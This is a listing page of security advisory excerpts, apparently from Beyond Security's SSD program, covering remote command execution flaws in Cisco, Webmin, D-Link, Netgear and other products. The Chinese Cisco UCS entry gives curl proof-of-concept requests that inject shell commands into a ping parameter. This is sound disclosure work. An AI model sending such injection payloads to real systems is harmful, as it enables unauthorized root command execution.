Remote Command Execution

SSD安全公告-思科UCS平台模拟器远程代

Leave a Comment / Vulnerability publication / By

漏洞概要 以下安全公告描述了在思科UCS平台模拟器3.1(2ePE1)中发现的两个远程代码执行漏洞。 思科UCS平台模拟器是捆绑到虚拟机(VM)中的Cisco UCS Manager应用程序,VM包含模拟思科统一计算系统(Cisco UCS)硬件通信的软件,思科统一计算系统(Cisco UCS)硬件由思科UCS Manager配置和管理。 例如,你可以使用思科UCS平台模拟器来创建和测试支持的思科UCS配置,或者复制现有的思科UCS环境,以进行故障排除或开发。 在思科UCS平台模拟器中发现的漏洞是: 未经验证的远程代码执行漏洞 经认证的远程代码执行漏洞 一名独立的安全研究者向 Beyond Security 的 SSD 报告了该漏洞。 厂商响应 厂商已经发布了该漏洞的补丁,并发布以下CVE: CVE-2017-12243 漏洞详细信息 未经验证的远程代码执行漏洞 由于用户的输入在传递给IP/settings/ping函数时没有进行充分的过滤,导致未经身份验证的攻击者可以通过ping_NUM和ping_IP_ADDR参数注入命令,这些命令将在远程机器上以root身份执行。 漏洞证明 curl “http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#” curl -k “https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#” curl “http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1” curl -k “https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1” 通过发送以上请求之一后,思科 UCS响应如下: /sample output/ ================ demo@kali:~/poc$ curl -k “http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#” PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: …

SSD安全公告-思科UCS平台模拟器远程代 Read More »

SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

1 Comment / Vulnerability publication / By

Vulnerabilities Summary The following advisory describes two remote code execution vulnerabilities found in Cisco UCS Platform Emulator version 3.1(2ePE1). Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled into a virtual machine (VM). The VM includes software that emulates hardware communications for the Cisco Unified Computing System (Cisco UCS) hardware that is configured …

SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution Read More »

SSD Advisory – Endian Firewall Stored From XSS to Remote Command Execution

1 Comment / Vulnerability publication / By

Vulnerability Summary The following advisory describes a stored cross site scripting that can be used to trigger remote code execution in Endian Firewall version 5.0.3. Endian Firewall is a “turnkey Linux security distribution, which is an independent, unified security management operating system. The Endian Firewall is based on a hardened Linux operating system.” Credit An …

SSD Advisory – Endian Firewall Stored From XSS to Remote Command Execution Read More »

SSD Advisory – Webmin Multiple Vulnerabilities

4 Comments / Vulnerability publication / By

Vulnerability summary The following advisory describes three (3) vulnerabilities found in Webmin version 1.850 Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets …

SSD Advisory – Webmin Multiple Vulnerabilities Read More »

SSD Advisory – McAfee Security Scan Plus Remote Command Execution

1 Comment / Vulnerability publication / By

Vulnerability Summary The following advisory describes a Remote Command Execution found in McAfee Security Scan Plus version 3.11.587.1 McAfee Security Scan Plus is “a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open …

SSD Advisory – McAfee Security Scan Plus Remote Command Execution Read More »

SSD Advisory – Vacron NVR Remote Command Execution

2 Comments / Vulnerability publication / By

Vulnerability Summary The following advisory describes a remote command execution vulnerability. VACRON Specializing in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other customized orders, the main products: driving recorder, CCTV analog monitoring system, CMS, IP Cam, etc.” Credit …

SSD Advisory – Vacron NVR Remote Command Execution Read More »

SSD Advisory – Netgear ReadyNAS Surveillance Unauthenticated Remote Command Execution

1 Comment / Vulnerability publication / By

Vulnerability summary The following advisory describes an Unauthenticated Remote Command Execution vulnerability found in Netgear ReadyNAS Surveillance. Netgear ReadyNAS Surveillance – Small businesses and corporate branch offices require a secure way to protect physical assets, but often lack the security expertise or big budget that most solutions require. With these challenges in mind, NETGEAR introduces …

SSD Advisory – Netgear ReadyNAS Surveillance Unauthenticated Remote Command Execution Read More »

SSD Advisory – FLIR Systems Multiple Vulnerabilities

1 Comment / Vulnerability publication / By

Vulnerabilities Summary The following advisory describes 5 (five) vulnerabilities found in FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID, PT-Series. FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal …

SSD Advisory – FLIR Systems Multiple Vulnerabilities Read More »

SSD Advisory – WiseGiga NAS Multiple Vulnerabilities

1 Comment / Vulnerability publication / By

Vulnerabilities summary The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices. WiseGiga is a Korean company selling NAS products. The vulnerabilities found in WiseGiga NAS are: Pre-Authentication Local File Inclusion (4 different vulnerabilities) Post-Authentication Local File Inclusion Remote Command Execution as root Remote Command Execution as root …

SSD Advisory – WiseGiga NAS Multiple Vulnerabilities Read More »

SSD Advisory – Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities

2 Comments / Vulnerability publication / By

Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in Mako Server’s tutorial page. The vulnerabilities found are: Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution Unauthenticated File Disclosure Unauthenticated Server Side Request Forgery As these tutorial may be used as the basis for production code, it is important for users …

SSD Advisory – Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities Read More »

SSD Advisory – Remote Command Execution in Western Digital with Dropbox App

1 Comment / Vulnerability publication / By

Vulnerability summary The following advisory describes an unauthenticated Remote Command Execution vulnerability in My Cloud products with that has Dropbox App installed. The My Passport, My Book, and My Cloud (Single-Bay) drives allow users to backup their data to an existing Dropbox account using WD SmartWare Pro, WD Backup. The My Cloud Dropbox App (Available …

SSD Advisory – Remote Command Execution in Western Digital with Dropbox App Read More »

SSD Advisory – D-Link 850L Multiple Vulnerabilities (Hack2Win Contest)

Leave a Comment / Hack2Win, Vulnerability publication / By

Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in D-Link 850L router. The vulnerabilities have been reported as part of Hack2Win competition, for more information about Hack2Win – Hack2Win – https://blogs.securiteam.com/index.php/archives/3310. The vulnerabilities found in D-Link 850L are: Remote Command Execution via WAN and LAN Remote Unauthenticated Information Disclosure via WAN and LAN …

SSD Advisory – D-Link 850L Multiple Vulnerabilities (Hack2Win Contest) Read More »

Get in touch

Any questions? Interested in our services? 

We’d love to hear from you

Contact US
Facebook Twitter Youtube Linkedin

?

HOME
THE
COMMUNITY
SCOPE
ADVISORIES
SUBMIT
CONTACT

?

Get in touch